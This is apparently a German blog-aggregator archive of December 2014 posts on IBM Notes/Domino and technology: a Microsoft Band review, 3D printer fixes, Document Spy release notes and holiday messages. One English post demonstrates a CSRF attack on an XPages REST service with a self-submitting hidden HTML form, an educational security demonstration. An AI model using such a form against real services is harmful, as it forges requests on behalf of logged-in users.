Archive for: ‘Dezember 2014’

Außer Rand und Band

31. Dezember 2014 Posted by Alexander Kluge

Microsoft Band

Der Weihnachtsmann scheiterte am Hauptzollamt. Jetzt ist die Lieferung angekommen.
Vor etwas einem Jahr waren wir ausgestiegen aus dem Fitness Tracker Geschäft. Schritte zählen war spannend, aber auf die Dauer ohne großen zusätzlichen Erkenntnisgewinn. Das iPhone 5S und das neue iPhone 6 zählten ab dann die Schritte auch verläßlich. Für die Runden um den See ist nach wie vor der Runkeeper auf dem iPhone die Wahl, das Flex wurde anderen bedürftigen Sportlern weitergegeben.

Nun also das Microsoft Band. Eines wird schnell klar: Das Band ist ein Fitness Tracker, keine Smartwatch. Das Display zeigt das nötigste an, aber interagieren will man mit dem Gerät nicht. Das spannendeste Feature ist die Pulsmessung. Natürlich kann das Band Schritte zählen, Schlafqualität tracken, Uhrzeit anzeigen und auch ein paar Zeilen SMS anzeigen. Entscheidend für uns war aber der Heartrate Monitor. Und der funktioniert erstaunlich gut.

Auch sehr positiv: Das Band hat GPS an Bord, im Gegensatz zur ersten kommenden Version der Apple Watch. Damit muss das iPhone nicht mehr mit zum Waldlauf, es reicht das Band. Auch die Offenheit ist positiv, das Band verträgt sich mit iOS, Android und natürlich Windows Phone – und es konnektiert eine Reihe von anderen Fitness Plattformen.

Erste Downside: Das Band ist unbequem. Ich musste auch erst über andere Reviews darauf kommen, das Band mit der Display-Seite nach unten zu tragen. Dann sieht es auch nicht unbedingt so klobig aus, es trägt sich ein wenig besser. Hübsch ist es dennoch nicht. Aber es soll ja auch nur ein Fitness Tracker sein. Smartwatch kommt später.

Zweites Manko: Das Band ist nicht wasserdicht. Ich wiederhole: Es ist NICHT wasserdicht. Das ist für mich eigentlich einer der größten Nachteile. Das Fitbit Flex habe ich immer getragen. Nach dem Lauf der Sprung in den See – kein Problem. Nach dem Sport ab in die Sauna oder unter die Dusche ist jetzt nicht mehr.

Einen Fitness Tracker will man eigentlich immer tragen. Das führt dann auch zum letzten Punkt: Ein Fitbit Flex hat man einmal pro Woche geladen, das Band muss alle zwei Tage an den Strom. Je mehr GPS Nutzung, desto schneller. In der Zeit misst das Ding natürlich nichts.

Das Band wird jetzt dem familiären Dauertest unterzogen. Die Gattin ist sehr glücklich. Immerhin vibriert jetzt das Band am Handgelenk, wenn ich anrufe. Vorher verhallten meine Anrufe ungehört in der Handtasche. So ein Band kann zumindest Ehen retten.

Einen schwungvollen Start in das neue Jahr 2015!

31. Dezember 2014 Posted by Roswitha Boldt

Bild

REST & Security: CSRF Attacks

30. Dezember 2014 Posted by Sven Hasselbach

In this post I will demonstrate how a do a CSRF attack against a XPages REST service.

Let’s assume that we have a custom REST service on a XPage. To keep the example as simple as possible, this service returns the posted data back to the requesting browser only, nothing more and nothing less:

<?xml version="1.0" encoding="UTF-8"?>
<xp:view
    xmlns:xp="http://www.ibm.com/xsp/core"
    xmlns:xe="http://www.ibm.com/xsp/coreex"
    rendered="false">
    
    <xe:restService
        id="restService"
        pathInfo="foo">
        <xe:this.service>
            <xe:customRestService
                requestContentType="application/json"
                requestVar="data" 
                doPost="#{javascript:toJson( requestScope.data )}">
            </xe:customRestService>
        </xe:this.service>
    </xe:restService>

On my web server, I have created a simple HTML page with a form:

<html>
    <head />
    <body>
        <form name="CSRFAttack" enctype="text/plain"
            action="http://localhost/REST.nsf/CSRF.xsp/foo/" method="POST">
          <input type="hidden" name='{"Hello": "World"}'>
        </form> 

        <script>document.CSRFAttack.submit();</script>
    </body>
</html>

As soon a user (which is logged on my domino server) opens the HTML page, the form is automatically posted to the REST service.

1. User opens the “bad site”

2. Then the form is sent to the server

3. And the request is processed by the REST service


Et voilà, the CSRF attack was successfull.

Die nächste Generation

30. Dezember 2014 Posted by Gerd

Das Video zeigt ganz gut die nächste Generation – Magazine?

Click here to view the embedded video.

Die nächste Generation

30. Dezember 2014 Posted by Gerd

Das Video zeigt ganz gut die nächste Generation – Magazine?

Besserer Transport für meinen 3D Drucker – Teil 2

29. Dezember 2014 Posted by motzet-online.de

Wie gestern schon beschrieben, wird der Transport des Filaments durch Probleme auf der Trommel beeinträchtigt. Als Lösung hat Daniel ein Gestell entwickelt, auf dem vier Kugellager aufgebracht werden ...

[EN] Mobilizing the workforce is about building a plethora of both internally and externally facing Apps

29. Dezember 2014 Posted by StefanP.

Enterprises are increasingly realizing that mobilizing their workforce isn’t just about giving everyone a smartphone with email access, rather it’s about building a plethora of both internally and externally facing applications – for marketing, operations, collaboration etc.

via As Mobile Software Starts Gaining Enterprise Traction, Progress Software Acquires Telerik.


Filed under: English Tagged: Mobile, Workplace-of-the-Future

Besserer Transport für meinen 3D-Drucker

28. Dezember 2014 Posted by motzet-online.de

Die meisten Probleme mit meinem 3D-Drucker kommen von ungleichmäßigem Transport, entweder weil: das Filament nicht richtig angedrückt wird, oder weil sich das Filament auf der Trommel verhackt hat. ...

Documen Spy 1.1 brings bug fixes and a new edit field feature.

28. Dezember 2014 Posted by Ralf Petter

November and December were very busy month for me, so i was pretty quiet on my blog. I hope this will change again in the new year. But as a late time Christmas present, i have uploaded the new 1.1 Version of my most popular free tool "Document Spy" for IBM Notes. If you do not know the "Document Spy" you can read all the details about the functionality this plugin adds to your 8.5.x and 9.0.x Notes Standard client in my blog post "Document Spy Admins little helper".

The 1.1 version contains some bug fixes, especially a fix for a bug Jesper Kiaer has reported, that Document Spy can crash, when you select more then one document at a time. The fix is that only one document of the whole selection will be loaded in Document Spy at one time. I hope this will solve the problem of Jesper.

But the 1.1 version does not only bring bug fixes it also contain the most requested feature in the feedback i have got for Version 1.0. It is a function to make quick changes to fields in the Document Spy. I allows you to change Text, Date and Number single and multiple value fields.

Follow this simple tutorial to change the Delivered Date of an e-mail message:

Select the e-mail you want to change and the Document Spy will show all items of the selected message in the sidebar view.


Scroll to the row with the "Delivered Date" item and Double click it.

You will get a simple Dialog with the value and you can change the value to what ever you want. But be careful, because there are only basic checks whether your new value will be a valid one.

 
Press Ok and the new value will be saved to the document and the Document Spy view will be refreshed. If the document is open in the UI you have to reload it to see the changes. Be aware that you will produce save conflicts if you make changes in Document Spy and the UI of Notes at the same time.

If you want to change a multiple value field, the values have to be separated with a "|". You can escape "|" with a leading backslash. See the $mailer field for an example.

  
This item have 2 separated values "IBM Notes Release 9.0.1 FP1| April 05, 2014" and "Test" The "|" in the first value is escaped by the backslash.

This new feature will save you a lot of work that you would otherwise spend on creating temporary agents.

To install the Document spy follow the installation instructions on the Download page of the widget.

 If you can not access data on google drive i can send you the updatesite per mail

If you want report problems or give feedback please add a comment or mail me on ralfDotPetterAtgmailDotcom







Jahresendweihnachtspost.

24. Dezember 2014 Posted by Alexander Kluge


“Und dann muss man ja auch noch Zeit haben, einfach dazusitzen und vor sich hin zu schauen…”

Aufgeschrieben von Astrid Lindgren. Ausgeliehen beim Herrn Haydecker. Stellvertretend für den im Klugen Haus immer geäußerten, aber nie realisierten Wunsch nach “einfach mal blöd gucken”.

Wünsche Euch allen wunderbare Feiertage, schaut einfach mal auch, wie Farbe an der Wand trocknet – 2015 wird noch aufregend genug.

ITWU “over and out” für 2014

23. Dezember 2014 Posted by Katrin Benteler

for the english post, please scroll down

Nach der Hektik und den vielen neuen Gesichtern der letzten Wochen kehrt langsam endlich Ruhe im ITWU-Büro ein. Die letzten Tickets werden geschlossen, der Schreibtisch wird nochmal aufgeräumt und die letzten Weihnachtsplätchen werden vernascht ;-)

Heute abend verabschiedet sich das ITWU Team in den wohlverdienten Weihnachtsurlaub. Die ersten fleißigen Bienchen sind schon am 02.01.2015 wieder im Büro, den Großteil werdet ihr aber erst am 05.01. wieder antreffen.

Wenn ihr nicht so lange warten wollt, bleibt euch leider nur der Weg der E-Mail - entweder an uns direkt oder an info@itwu.de. Wir melden uns dann sobald wie möglich!

Bis dahin wünscht die ITWU euch und euren Lieben ein schönes Weihnachtsfest und einen guten Rutsch in ein hoffentlich erfolgreiches Jahr 2015!

 

At last, leaving the rush of these past few weeks behind it's getting quiet around the ITWU office. The last tickets of the year are finished, the desk is tidy (for the frist time in months) and the last christmas cookies are about to vanish into thin air.

Tonight, the ITWU family leaves the office one last time this year for the well deserved holiday vacation. The first busy bees are about to return on the 2nd of January though you will have to wait for the 5th of January to catch the whole bunch of us.

Those of you who cannot wait that long must simply send us an e-mail - either to our personal addresses or to info@itwu.de. We will get back to you as soon as possible!

Until then we wish you a very merry christmas and a happy and hopefully successful 2015!

 

REST & Security

23. Dezember 2014 Posted by Sven Hasselbach

I am currently wearing my white hat and doing some pen and vulnerabilty tests for a RESTful API. While this is actually a hot topic in the Domino world, here are some resources

 

Frohe Weihnachten und einen guten Rutsch

23. Dezember 2014 Posted by IBM Experts

Das Team von IBM_Experts wünscht Ihnen gesegnete Weihnachten 2014 und einen guten Rutsch ins neue Jahr.  Ab spätestens nach Hl. Drei Könige am 7. Januar sehen wir uns in alter Frische wieder und...

Neue Teamleitung

23. Dezember 2014 Posted by Ralph Rost

Die Teamleitung ‘Professional Services’ übernimmt ab 01.01.2015 Herr Oliver Regelmann.

Veränderungen in der Geschäftsleitung

23. Dezember 2014 Posted by Ralph Rost

In der Geschäftsleitung der n-komm GmbH haben zum 01.Januar 2015 Änderungen stattgefunden. Herr Ralph Rost, vormals Leiter des Teams Professional Services, ist neuer technischer Geschäftsführer der n-komm GmbH. Als Teamleiter für Professional Services rückt Herr Oliver Regelmann nach.